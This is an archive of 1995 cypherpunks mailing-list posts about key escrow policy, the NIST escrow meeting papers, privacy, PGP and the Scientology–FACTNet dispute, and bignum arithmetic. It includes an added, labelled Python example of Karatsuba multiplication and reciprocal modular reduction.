A review board consisting of cypherpunks has no more right to listen
to my private conversations than does the FBI, so I would not agree
to that proposal either.

  --buford





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rob L <robl@on-ramp.ior.com>
Date: Thu, 7 Sep 95 19:33:40 PDT
To: starrd <starrd@iia2.org>
Subject: Re: Collection of personal info
In-Reply-To: <Pine.BSD.3.91.950907172351.22454B-100000@usr2.primenet.com>
Message-ID: <Pine.LNX.3.91.950907193129.19445B-100000@on-ramp.ior.com>
MIME-Version: 1.0
Content-Type: text/plain





> 
> Welcome, you will learn a lot of great material here, and yes it is 
> neato.  I just wish it came pre-installed with WinDoze...

Don't worry, as soon as it becomes politically correct, and MS can find a 
way to make $$ on it, it will be rammed down our throats in WinDoze.. :)






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rob L <robl@on-ramp.ior.com>
Date: Thu, 7 Sep 95 19:40:22 PDT
To: starrd <starrd@iia2.org>
Subject: Re: ON OFF-TOPIC
In-Reply-To: <Pine.BSD.3.91.950907173758.22454D-100000@usr2.primenet.com>
Message-ID: <Pine.LNX.3.91.950907193542.19445C-100000@on-ramp.ior.com>
MIME-Version: 1.0
Content-Type: text/plain



> > 
> > Was this really needed?
> 
> Yes, it is my bet that there are some patriots in this list.  The desire 
> to protect one's privacy is a very "patriot" thing to want to do.  
> CyPherpunks appears to be a lot of people who are against big brother 
> government, and quite probably for restoring the constitution...am I right?

I am one as well.. being pro-2nd amendment, and pro-1st.. and learning 
lots about the fight to protect them. Unlike some of the non-US readers 
in this list, I can see the clear connection between the 1st and 2nd 
amendment attacks.. if one falls, the other does as well. Both are slowly 
being whittled away to nothing (i.e. you can have only certain 
'assault-style' guns, and you can only be guaranteed certain types of 
free speech)

RobL





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mac Norton <mnorton@cavern.uark.edu>
Date: Thu, 7 Sep 95 17:42:17 PDT
To: Rob Lowry <robl@on-ramp.ior.com>
Subject: Re: Collection of personal info
In-Reply-To: <Pine.LNX.3.91.950906210405.19265B-100000@on-ramp.ior.com>
Message-ID: <Pine.SOL.3.91.950907194034.19234A-100000@cavern>
MIME-Version: 1.0
Content-Type: text/plain


A somewhat similar system does exist, also under federal
statute, for credit reporting agencies.

YMMV

MacN

On Wed, 6 Sep 1995, Rob Lowry wrote:

> 
> > Nor was I suggesting a legal solution (I know your comment
> > was triggered by Rob's request for legal recourse) but instead
> > suggesting that things are farther along than some people realize.
> 
> Nor do I support additional rules/laws or regulations.. but if there are 
> existing ones to screw with, use 'em..
> Recently I had a bill turned over to collections from, of all places, the 
> daycare we used to take our kids to.. we owe them about $1300 in their 
> estimation. The reason we have not paid is due to 11 days of lost work 
> due to head lice that they provided to my kids, plus they stopped serving 
> breakfast which was in the contract we signed when enrolling the kids there..
> I was notified by the collection co. about this submittal (now $1500 for 
> some reason..) and by law, I can dispute this in writing, thus slowing 
> the wheels of the collection monster horribly. I did so.. and for the 
> last 4 months, they have been trying to prove I owe money.. I was asking 
> if such a system exists for the release of your credit info.. and it 
> appears that there is no safety mechanism in that monster.  Rather than 
> cry out for more laws to be twisted against us later, I agree that 
> letting it happen, and using cash instead of credit, is the smart answer 
> here.
> 
> Someone care to point me at e-cash info? sounds interesting.. remember, 
> I am new to the crypto scene and still think PGP is neato ;)
> 
> 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dr261@cleveland.Freenet.Edu (Tobin T Fricke)
Date: Thu, 7 Sep 95 17:32:47 PDT
To: cypherpunks@toad.com
Subject: Re: Collection of personal info
Message-ID: <199509080005.UAA26943@kanga.INS.CWRU.Edu>
MIME-Version: 1.0
Content-Type: text/plain


>letting it happen, and using cash instead of credit, is the smart answer

I'm somewhat surprised at how much of an issue this is.   The
federal government prints up nice green paper for us to pay for
things with.  It's anonymous (to a large extent), universally
accepted (most of the time), fairly untraceable (unless you 
really want to), easily available, doesn't collect interest,
free to use, etc.  No one is forcing anyone to use credit
cards, etc..  Then again, being a kid, I have never bought
anything with anything other than cash on the spot...

--
Tobin Fricke (aka LightRay)       The Digital Forest BBS (714)586-6142
dr261@kanga.ins.cwru.edu          KE6WHF Amateur Radio, 1:103/925 fido




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hallam@w3.org
Date: Thu, 7 Sep 95 17:14:46 PDT
To: cypherpunks@toad.com
Subject: Re: GAK Hacks
In-Reply-To: <8921.9509071941@exe.dcs.exeter.ac.uk>
Message-ID: <9509080010.AA06896@zorch.w3.org>
MIME-Version: 1.0
Content-Type: text/plain



>One of their requirements was resistance to static patches, as someone
>else pointed out that is just not possible in software, if someone gets
>really bored they can at worst disassemble the entire thing, and
>re-write it from scratch without any silly GAK stuff, or with a row of
>00s where the escrowed key goes.

I think I would prefer the escrowed key to a row of 00's, if someone wanted to 
decode the message they could just use the all 00's key :-)

	Phill




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: modemac@netcom.com (Modemac)
Date: Thu, 7 Sep 95 20:15:52 PDT
To: letters@2600.com
Subject: Scientology tries to break PGP - and fails?
Message-ID: <199509080312.UAA03808@netcom15.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


News Flash!

According to an informed source, the so-called "church" of Scientology is
trying to force Larry Wollersheim to give them his de-encryption code for
PGP. 

Larry Wollersheim is the director of FACTNet, a Colorado BBS that 
specializes in distributing information about religious cults - 
especially the Church of Scientology.  Scientologists raided FACTNet 
recently and seized its hardware and records, in a case that has 
spread news of the Scientology wars all over the Internet.

Scientology has been in possession of Larry Wollersheim's computer 
records for quite a while now - at least three weeks, I believe.  They 
have been scanning it for what they claim to be "copyright violations."  
Yet, their list of scanning criteria also includes a list of 34 names of 
their critics and enemies, including a famous Netizen named "Rogue Agent."

Yet it seems that despite all their efforts to get what they want, they 
can't break PGP - so they have to force Wollersheim to reveal the key.

Mr. Wollersheim has stated that he will go to jail before he reveals his 
encryption key.

Please forward this note to all interested parties.

Call this one: BIG WIN FOR PGP!

For more information on Scientology's war against the Internet, read the 
many Web pages set up to cover the story.  My own page, an "Introduction 
to Scientology," is:

	http://www.tiac.net/users/modemac/cos.html

It includes a link to the FACTNet Web page, as well as Ron Newman's 
famous Web page: "The Church of Scientology vs. the Net."




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Thu, 7 Sep 95 20:26:22 PDT
To: cypherpunks@toad.com
Subject: Correction about who opposes crypto regulations....
Message-ID: <ac75051735021004fa02@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 2:16 AM 9/8/95, hallam@w3.org wrote:
>>Nope.  but the patriots & the cyPHerpunks share a common goal, and belief
>>that it is none of the government's business what we think or want to
>>share with our computers.
>
>Poor you, the only major political party to come out with a pro crypto
>statement
>is a socialist party.

On the contrary, the Libertarian Party has come out strongly in favor of
cryptography and privacy, and they are consistently either #3 or #4 in
popularity. (I believe Peace and Freedom is usually #4 and LP is usually
#3.)

Their home page (http://www.access.digex.net/~lphq/lphq.html) says: "The
LPHQ is the center of activities of the Libertarian Party, the third
largest political party in the U.S. We stand for individual liberty, both
in terms of personal and financial freedom."

It is impossible to argue that the Libertarian Party is opposed in any way
to the right to encrypt, and their 1994 platform makes this clear:

"We oppose all  proposed regulations of civilian research on encryption
methods. We also  oppose government classification of such research or
requirements that deciphering methods be disclosed to the government."

I point this out not to argue in favor of the LP here, but to correct a
seriously incorrect statement.


--Tim May



---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: aba@dcs.exeter.ac.uk
Date: Thu, 7 Sep 95 12:42:21 PDT
To: tcmay@got.net
Subject: Re: GAK Hacks
Message-ID: <8921.9509071941@exe.dcs.exeter.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain



Tim May <tcmay@got.net> writes on cpunks:
> We did it for SSL, let's do it for GAK.
> 
> Demonstrate that superencryption (encrypting within a GAK wrapper) defeats
> GAK. And other kinds of hacks, including releasing "damaged" (inoperative)
> versions of the proposed code (when it becomes available).

I was just drooling over the fun to be had if and when this crap goes
through.  Surely a very fun thing to do.  A new legit hobby for all
those games crackers out there.  (Hmm maybe not so legit, micro$oft
has non- reverse engineering clauses on their stuff, but that doesn't
stop anyone, and there's always remailers).

One of their requirements was resistance to static patches, as someone
else pointed out that is just not possible in software, if someone gets
really bored they can at worst disassemble the entire thing, and
re-write it from scratch without any silly GAK stuff, or with a row of
00s where the escrowed key goes.

> Or releasing "work-alikes." Etc.
> 
> Granted, the demonstrations will be less clear than breaking the 40-bit key
> was, partly because there is no clear-cut standard out there, and many
> aspects of GAK are still in flux.
> 
> But it could still be a powerful example, an example "by direct
> demonstration," that government-mandated key escrow is problematic.
> 
> (Of course, a sufficiently powerful or clear demonstration, picked up by
> the popular press the way the SSL challenge was, could also cause the
> government to tighten up the rules on GAK, such
> as--speculatively!!!!--adding "compliance audits" to the GAK laws.)

So the question is what do you prefer: 40 bits only or 64 bits which
can be broken?  Is it worth sabotaging what is essentially an
impossible task open to having the GAK element hacked out?  It would
be much more fun if they'd agree to no limits on key sizes, and GAK.

What happens if the result of the talks which Pat Farrell kindly
described is that it is impossible?  What is their next move?  We've
had "voluntary" hard-ware key-escrow, and it got chucked out by
widespread derision of the idea, now the same in software.  Which
direction does the next phased attack come from?

> But GAK Hacking could be an interesting project.

indeed.

Adam





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Thu, 7 Sep 95 20:31:29 PDT
To: cypherpunks@toad.com
Subject: Shams and Shame
Message-ID: <ac75086236021004c02b@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 2:34 AM 9/8/95, Pat Farrell wrote:

>I am even willing to type in some, but that is known to cause typos,
>as I can't type, and even spellcheckers can't tell real words
>such as 'sham' from 'shame'

Yeah, it's a real sham you can't spel.

--Tin May



---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ghio@c2.org (Matthew Ghio)
Date: Thu, 7 Sep 95 18:02:47 PDT
To: cypherpunks@toad.com
Subject: Re: Commercial Speech over Internet product
In-Reply-To: <9508078105.AA810503582@snail.rsa.com>
Message-ID: <m0sqray-0012qWC@myriad>
MIME-Version: 1.0
Content-Type: text/plain


>        Here's an article about a commercial company that is doing speech
>over the Internet.  Maybe someone would like to help them add encryption.
>                --Bob Baldwin, speaking for myself only.

The program is a sound-listening extension for web-browsers.  There is
really no use for crypto because it's only processing information which
is already public.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Cromwell <rjc@clark.net>
Date: Thu, 7 Sep 95 17:49:09 PDT
To: weidai@eskimo.com (Wei Dai)
Subject: Re: fast modular reduction
In-Reply-To: <Pine.SUN.3.91.950907131638.6760C-100000@eskimo.com>
Message-ID: <199509080048.UAA19561@clark.net>
MIME-Version: 1.0
Content-Type: text/plain



> 
> The numbers you give are a bit off.  Assuming a 32-bit machine,
> n=64 implies a 2048-bit modulus, and a 4096-bit number to be reduced. 
> Also, Karatsuba should use 1/3 (2*64^1.58 / 64^2) the multiplications
> rather than 1/5. 

The n=64 implies two 2048-bit numbers are being multiplied. The 2048-bit
number comes from the fact that in a typical crypto app, modexp
will be reducing numbers as large as the modulus squared which runs
2048-bits for a 1024-bit modulus. The reciprocal is 1 block
bigger than the number to be reduced. Hence, you are dealing with
multiplying about two 2048-bit numbers. But since we only care
about the "fractional" part of the result, we can safely throw
away half the computation and only compute half the Karatsuba
recursion tree. (the number before the decimal point is the
quotient) Then, to determine the final remainder, we simply
multiply by the modulus again, throwing away non-significant
computation again. There is a normal n^2 method for reducing
via reciprocal that only uses 1/4 the number of ops as the obvious
technique.

You're right about the 1/3 vs 1/5, I dunno where the 5 came from, must
have been a typo in my calcs. The problem with Karatsuba is that it's
hard to implement efficiently. Temporary ints should be kept to
a minimum and be preallocated. The combine step requires 1 store,
and 5 additions, of multiprecision integers. The split step requires
no copying if you use pointer manipulation, and instead of shifting,
don't add in place, but add "with shift" to the destination. Most
of the implementations I've seen do too much copying and shifting.

Given that some modern processors have efficient hardware multiply,
it might not be worth all the trouble to trade mults for adds. If
a processor has an efficient hardware FFT, it might even be worthwhile
to use the FFT multiply method.

Do you have a ref for the Montgomery method? I'm unfamiliar with
the name, I wonder if it's something I've seen before under
a different label.

Check out Schonhage's book "Fast Algorithms". They've implemented
all the asymptotic algorithms efficiently and gathered
performance data. I corresponded with Schonhage's grad student
and he told me that Karatsuba wins for n>=8, which I find difficult
to see, when it takes about n=32 for my own implementation (not
optimized) to break even.

-Ray
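
The reduction-by-reciprocal and Karatsuba steps discussed in the message above, as an added example that is not part of the original post and is not any poster's code. Assumptions: 32-bit limbs, hypothetical function names, the subtractive Karatsuba variant, and full products rather than the truncated half recursion tree the message describes.

```python
import random

WORD_BITS = 32  # assumption: 32-bit machine words, as in the thread


def karatsuba(a, b, limbs, counter):
    """Multiply non-negative ints of up to `limbs` words each.

    counter[0] is incremented once per single-word multiply so the cost
    can be compared with the schoolbook limbs**2.
    """
    if limbs == 1:
        counter[0] += 1
        return a * b
    half = limbs // 2
    shift = half * WORD_BITS
    mask = (1 << shift) - 1
    # Split step: masks and shifts only, no copying of the operands.
    a_lo, a_hi = a & mask, a >> shift
    b_lo, b_hi = b & mask, b >> shift
    lo = karatsuba(a_lo, b_lo, half, counter)
    hi = karatsuba(a_hi, b_hi, limbs - half, counter)
    # Subtractive middle term keeps both operands within limbs - half words.
    da, db = a_hi - a_lo, b_hi - b_lo
    mid = karatsuba(abs(da), abs(db), limbs - half, counter)
    if (da < 0) != (db < 0):
        mid = -mid
    cross = hi + lo - mid  # equals a_hi*b_lo + a_lo*b_hi
    # Combine step: add "with shift" into the destination.
    return (hi << (2 * shift)) + (cross << shift) + lo


def word_multiplies(limbs, seed=7):
    """Count single-word multiplies for one limbs x limbs Karatsuba product."""
    rng = random.Random(seed)  # constructed sample operands
    a = rng.getrandbits(limbs * WORD_BITS)
    b = rng.getrandbits(limbs * WORD_BITS)
    counter = [0]
    if karatsuba(a, b, limbs, counter) != a * b:
        raise ArithmeticError("karatsuba product mismatch")
    return counter[0]


def reciprocal(m, k_limbs):
    """Scaled reciprocal floor(2^(2*k*32) / m), computed once per modulus."""
    return (1 << (2 * k_limbs * WORD_BITS)) // m


def reduce_by_reciprocal(x, m, mu, k_limbs, counter=None):
    """Return (x mod m, corrections) using two multiplies and no division.

    Requires 0 < m < 2^(k*32) and 0 <= x < 2^(2*k*32), i.e. x is at most
    the size of the modulus squared.
    """
    counter = [0] if counter is None else counter
    total_bits = 2 * k_limbs * WORD_BITS
    if not 0 < m < (1 << (k_limbs * WORD_BITS)):
        raise ValueError("modulus does not fit in k limbs")
    if not 0 <= x < (1 << total_bits):
        raise ValueError("x does not fit in 2k limbs")
    limbs = 2 * k_limbs + 1
    # The part of x*mu "before the decimal point" is the quotient estimate.
    q = karatsuba(x, mu, limbs, counter) >> total_bits
    # Multiply by the modulus again to recover the remainder.
    r = x - karatsuba(q, m, limbs, counter)
    corrections = 0
    while r >= m:  # the estimate can be low by a small amount, never high
        r -= m
        corrections += 1
    return r, corrections


def demo(seed=1995, k_limbs=32, trials=20):
    """Reduce products of residues for a constructed 1024-bit odd modulus."""
    rng = random.Random(seed)
    bits = k_limbs * WORD_BITS
    m = rng.getrandbits(bits) | (1 << (bits - 1)) | 1
    mu = reciprocal(m, k_limbs)
    ok, worst = True, 0
    for _ in range(trials):
        x = rng.randrange(m) * rng.randrange(m)  # what a modexp step reduces
        r, corrections = reduce_by_reciprocal(x, m, mu, k_limbs)
        ok = ok and (r == x % m)
        worst = max(worst, corrections)
    return ok, worst


if __name__ == "__main__":
    n = 64
    k = word_multiplies(n)
    print(f"n={n}: {k} word multiplies vs {n * n} schoolbook")
    print(f"two Karatsuba products / n^2 = {2 * k / (n * n):.3f}")
    print("reduction demo (all correct, worst corrections):", demo())
```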





 








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Thu, 7 Sep 95 17:55:55 PDT
To: cypherpunks@toad.com
Subject: Key Escrow Papers
Message-ID: <199509080055.UAA27687@pipe4.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   We have scanned several of the handouts at the NIST Key
   Escrow Issues Meeting of September 6 (not present Sept 7).

   Perhaps someone, Pat Farrell or another, would be willing
   to make them available on a homepage or ftp site. If so we
   will send them over. If nobody volunteers we will send them
   by our puny e-mail contraption. Here's what we have ready
   to send:


   1. The outlines of meeting topics of Raymond Kammer of NIST
      and Michael Nelson of the White House. (7kb)


   2. Discussion Paper No. 4, "Example Potential Solutions for
      the Draft Export Criteria for Software Key Escrow
      Encryption," which offers example solutions for each of
      the ten criteria. (7kb)


   3. The Business Software Alliance's dissenting blast at the
      government's key escrow proposal and export limit. This
      paper was loudly applauded. (19kb)


   4. Trusted Information Systems's "Thoughts on the NIST
      Escrow Issues Meeting Discussion Papers." (27kb in 2
      parts)


   5. TECSEC Incorporated's "Private Escrow Key Management: A
      Method and its Issues." (13kb)


   6. Dorothy Denning's "Comments on Draft Criteria for
      Software Key Escrow Exportability" and "Comments on
      Issues for Key Escrow Agents." (8kb)


   Two other papers will be scanned later:


   7. National Semiconductor's "Commercial Cryptography Ideas
      for Success" (9 pp. of large type) This contains
      graphics of the CAKE program and a "Proposed NIST Escrow
      Certificate Heirarchy" which cannot be easily
      distributed by us, so we offer this by fax.


   8. TECSEC's "The Merger of Technology and Cryptographic Key
      Management" (6 pp.).


   Note 1: It was Michael Nelson of the White House who said
   that the reason to maintain the 64-bit limit for export was
   because the key escrow methodology had not yet been proven
   reliable and that the security agencies insisted on the
   relatively weak system in case key escrow failed.


   Note 2: At the B-2 breakout session there was strong debate
   on a proposal for a "Criteria Zero":

      Before addressing any of the details of Criteria 3, 4
      and 9 as presented to us, Group B-2 registers its view
      that export under general license of strong encryption
      should not require key escrow.

   A vote on the proposal was 7 yes, 7 no and 13 abstentions.
   It was not reported to the plenary session.










From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Thu, 7 Sep 95 17:57:56 PDT
To: starrd <starrd@iia2.org>
Subject: Re: ON OFF-TOPIC
In-Reply-To: <Pine.BSD.3.91.950907173758.22454D-100000@usr2.primenet.com>
Message-ID: <199509080057.UAA05313@frankenstein.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



starrd writes:
> On Thu, 7 Sep 1995, Perry E. Metzger wrote:
> > 
> > Was this really needed?
> 
> Yes, it is my bet that there are some patriots in this list.

Pardon, but I don't care. There are also several socialists on this
list. Shall I help them out by posting a long tract on the labor
theory of value? There are several religious Christians here. Shall we
begin to discuss the divinity of Jesus? There are also some Jews here
-- we could have a bunch of religious debates, and the atheists could
kick in some mud, too. There are lots of folks here who wear shoes --
perhaps we could discuss the merits of different brands.

> The desire 
> to protect one's privacy is a very "patriot" thing to want to do.  

But this isn't a list for "patriot"s.

> CyPherpunks appears to be a lot of people who are against big brother 
> government, and quite probably for restoring the constitution...am I right?

Cypherpunks is a list for people interested in cryptography and its
impact on privacy, law, society, etc. It is not a list for people to
discuss libertarianism, socialism, constitutionalism, whether the
president has just flown over your ranch in a black helicopter, whether
the CIA was responsible for brainwashing your pet rat Algernon,
whether David Koresh was the messiah, or how many members of the
Federal Protective Service it takes to change a paper shredder.

There are lots of places to discuss these topics on the net. There is
only Cypherpunks for discussing the overall impact of cryptography on
society, and this is a fairly good place to discuss crypto algorithms
and the like because it is (amazingly) fairly high s/n compared to,
say, sci.crypt. Please help out by not polluting one of the few places
to discuss these issues with stuff you can talk about anywhere.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Doug Hughes <doug@Eng.Auburn.EDU>
Date: Thu, 7 Sep 95 19:05:07 PDT
To: Pat Farrell <pfarrell@netcom.com>
Subject: Re: Notes from NIS&T Key Escrow Export conference.
In-Reply-To: <76629.pfarrell@netcom.com>
Message-ID: <Pine.SUN.3.91.950907210308.27820A-100000@nexus.eng.auburn.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 7 Sep 1995, Pat Farrell wrote:

> 
> >> It is clear that this meeting is a shame. Everyone in industry
> > A shame certainly, but I suspect you meant 'sham' (not a spelling flame,
> > the difference in meaning is important).
> 
> Sorry for the typo, yes, I meant sham, fake, theater, all smoke  and
> mirrors, nothing sincere, etc. See reference to "stage" above.
> 
> 
In this context, I think burlesque fits remarkably well. ;)
(Brings to mind a bunch of cross-dressers doing big theatre numbers
in exotic costumes)

____________________________________________________________________________
Doug Hughes					Engineering Network Services
System/Net Admin  				Auburn University
			doug@eng.auburn.edu
	Apple T-shirt on Win95 - "Been there, done that"





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Pat Farrell" <pfarrell@netcom.com>
Date: Thu, 7 Sep 95 18:18:20 PDT
To: cypherpunks@toad.com
Subject: Re: Notes from NIS&T Key Escrow Export conference.
Message-ID: <76629.pfarrell@netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


  "Peter Trei" <trei@process.com>  writes:
> I think we can infer from this that the USG has, or soon expects to have,
> the ability to brute 64 bits of key.

That is what I heard (implied) too. If not today, in a reasonably
foreseeable future. Remember, this is not an issue today, only weirdos
such as the c'punks care today. The govies move slowly. They are
setting the stage for tomorrow.

>> It is clear that this meeting is a shame. Everyone in industry
> A shame certainly, but I suspect you meant 'sham' (not a spelling flame,
> the difference in meaning is important).

Sorry for the typo, yes, I meant sham, fake, theater, all smoke  and
mirrors, nothing sincere, etc. See reference to "stage" above.

All typos are mine.

Pat

Pat Farrell    Grad Student      http://www.isse.gmu.edu/students/pfarrell
Info. Systems & Software Engineering, George Mason University, Fairfax, VA
PGP key available on homepage               #include <standard.disclaimer>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Joel McNamara <joelm@eskimo.com>
Date: Thu, 7 Sep 95 21:29:12 PDT
To: cypherpunks@toad.com
Subject: NIST Escrow Papers - Now Web Available
Message-ID: <199509080429.VAA22176@mail.eskimo.com>
MIME-Version: 1.0
Content-Type: text/plain


Several of the scanned hand-outs (courtesy of John Young) for the NIST September 5 workshop on key escrow are now available on my Web page:

http://www.eskimo.com/~joelm

Papers include: 

The outlines of meeting topics of Raymond Kammer of NIST and Michael Nelson of the White House. (KAMMER.TXT - 7kb)

Discussion Paper No. 4, "Example Potential Solutions for the Draft Export Criteria for Software Key Escrow Encryption," which offers example solutions for each of the ten criteria. (CRITERIA.TXT - 7kb)

The Business Software Alliance's dissenting blast at the government's key escrow proposal and export limit. This paper was loudly applauded. (BSA.TXT - 19kb)

Trusted Information Systems's "Thoughts on the NIST Escrow Issues Meeting Discussion Papers." (TIS.TXT - 27kb)

TECSEC Incorporated's "Private Escrow Key Management: A Method and its Issues." (TECSEC.TXT - 13kb)

Dorothy Denning's "Comments on Draft Criteria for Software Key Escrow Exportability" and "Comments on Issues for Key Escrow Agents." (DENNING.TXT - 8kb)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Yih-Chun Hu <yihchun@u.washington.edu>
Date: Thu, 7 Sep 95 21:38:04 PDT
To: hallam@w3.org
Subject: Re: ON OFF-TOPIC
In-Reply-To: <9509080216.AA07325@zorch.w3.org>
Message-ID: <Pine.OSF.3.91j.950907213051.24322B-100000@saul3.u.washington.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 7 Sep 1995 hallam@w3.org wrote:

> 
> >Nope.  but the patriots & the cyPHerpunks share a common goal, and belief 
> >that it is none of the government's business what we think or want to 
> >share with our computers.
> 
> Poor you, the only major political party to come out with a pro crypto statement 
> is a socialist party.

I think the libertarian position is inherently pro-crypto.
Besides, the French are socialist, and well, as far as crypto goes...

> 
> The problem is currently with the right wing, right wing democrats such as 
> Clinton and practically all the Republicans. 
> 

Whatever. Clinton proposed crypto, some democrat wrote the electronic
decency act. (In fact Gingrich was against it)

> If you want a debate on how to convince the authoritarians then perhaps you will 
> get some interest. Trying to make crypto control out to be a left/right or 
> pro/anti gun control issue is no more relevant than the pro/anti abortion 
> debate.

I think that to some extent it is very relevant to gun control in that
both can be abused and that both help the law-abiding citizen do things.

+---- Yih-Chun Hu (finger:yihchun@cs.washington.edu) ----------------------+
| http://www.cs.washington.edu/homes/yihchun     yihchun@cs.washington.edu |
| http://weber.u.washington.edu/~yihchun         yihchun@u.washington.edu  |
+---- PGP Key Fingerprints (Keys by FINGER or on WWW) ---------------------+
| 1024/E50EC641        B2 A0 DE 9E 36 C0 EB A6  F9 3E D2 DD 2F 27 74 79    |
| 2047/DF0403F9        18 EB 62 C8 7F 06 04 67  42 76 24 E2 99 D1 07 DC    |
+---- Random Thought ------------------------------------------------------+
|I conducted an experiment to test Murphy's Law, but everything went wrong.|
+--------------------------------------------------------------------------+





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@polaris.mindport.net>
Date: Thu, 7 Sep 95 19:12:32 PDT
To: Duncan Frissell <frissell@panix.com>
Subject: Re: cryptography eliminates lawyers?
In-Reply-To: <Pine.SUN.3.91.950907060030.15660D-100000@panix.com>
Message-ID: <Pine.SUN.3.91.950907221236.5719A-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain




On Thu, 7 Sep 1995, Duncan Frissell wrote:

> 
> 
> On Wed, 6 Sep 1995, Buford Terrell wrote:
> 
> > How could crypto put lawyers out of business?  People would still
> > have disagreements; plans would still go wrong; cars would still
> > crash.  More important, transactions would still need to be 
> > structured to carry out the desires of the parties while minimizing
> > risks.
> > 
> > Good communications technology, including crypto, could make lawyering
> > more efficient, but I suspect the savings would be minimal.
> 
> Well, if crypto reduces the role of government in human affairs, it will 
> reduce work for lawyers.

This first, I see....


> Telecoms will certainly break the professional 
> monopoly of lawyers (and other professionals).

This I don't.  How do you mean exactly?

> 
> DCF
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hallam@w3.org
Date: Thu, 7 Sep 95 19:17:10 PDT
To: cypherpunks@toad.com
Subject: Re: ON OFF-TOPIC
In-Reply-To: <Pine.BSD.3.91.950907180215.790B-100000@usr2.primenet.com>
Message-ID: <9509080216.AA07325@zorch.w3.org>
MIME-Version: 1.0
Content-Type: text/plain



>Nope.  but the patriots & the cyPHerpunks share a common goal, and belief 
>that it is none of the government's business what we think or want to 
>share with our computers.

Poor you, the only major political party to come out with a pro crypto statement 
is a socialist party.

The problem is currently with the right wing, right wing democrats such as 
Clinton and practically all the Republicans. 

Crypto is outside the left right debate which centers on economic goals, 
whether to help the poor or the rich. The crypto debate is on the 
authoritarian/libertarian axis which is orthogonal. George Orwell was a 
socialist, John Stuart Mill a Liberal, both had very anti-authoritarian views 
which used to be known as libertarian. 

If you want a debate on how to convince the authoritarians then perhaps you will 
get some interest. Trying to make crypto control out to be a left/right or 
pro/anti gun control issue is no more relevant than the pro/anti abortion 
debate.

	Phill





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sdw@lig.net (Stephen D. Williams)
Date: Thu, 7 Sep 95 18:49:37 PDT
To: ghio@c2.org (Matthew Ghio)
Subject: Re: Commercial Speech over Internet product
In-Reply-To: <m0sqray-0012qWC@myriad>
Message-ID: <m0sqt2k-0009yvC@sdwsys>
MIME-Version: 1.0
Content-Type: text/plain


> >        Here's an article about a commercial company that is doing speech
> >over the Internet.  Maybe someone would like to help them add encryption.
> >                --Bob Baldwin, speaking for myself only.
> 
> The program is a sound-listening extension for web-browsers.  There is
> really no use for crypto because it's only processing information which
> is already public.


That's not necessarily true:

I could set up a web server to only listen to a socket that a local ssh
socket proxy could connect to.  Restrict the ssh session for a particular
key to only allow connection to that one socket.  Then the connecting
party would need ssh running with socket proxy near(er) their client
system and the public key.

Assuming that you have a Unix workstation with audio listening software
or a nearby PC it would be easy to set up.

Internet/Web accessible RSA protected, session encrypted voice mail.

Now if someone would just port ssh to the PC as a selective Winsock
wedge...

(I'd love an example of Winsock wedge code (A la Surfwatch)!!!)
I have a neighbor that develops one of the commercial TCP/IP stacks, so
it's quite possible I could convince him to help.

With things like ssh, it's already very easy to create secure tunnels.

It wouldn't be too tough to modify a proxy to use ssh style connections
if an initial connection was found to be encrypted (or a key was cached
for a URL).

Of course, IPsec is coming...

sdw
-- 
Stephen D. Williams 25Feb1965 VW,OH (FBI ID) sdw@lig.net http://www.lig.net/sdw
Consultant, Vienna,VA Mar95- 703-918-1491W 43392 Wayside Cir.,Ashburn, VA 22011
OO/Unix/Comm/NN       ICBM/GPS: 39 02 37N, 77 29 16W home, 38 54 04N, 77 15 56W
Pres.: Concinnous Consulting,Inc.;SDW Systems;Local Internet Gateway Co.;28May95



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Pat Farrell" <pfarrell@netcom.com>
Date: Thu, 7 Sep 95 19:52:19 PDT
To: cypherpunks@toad.com
Subject: RE: Key Escrow Papers
Message-ID: <81288.pfarrell@netcom.com>
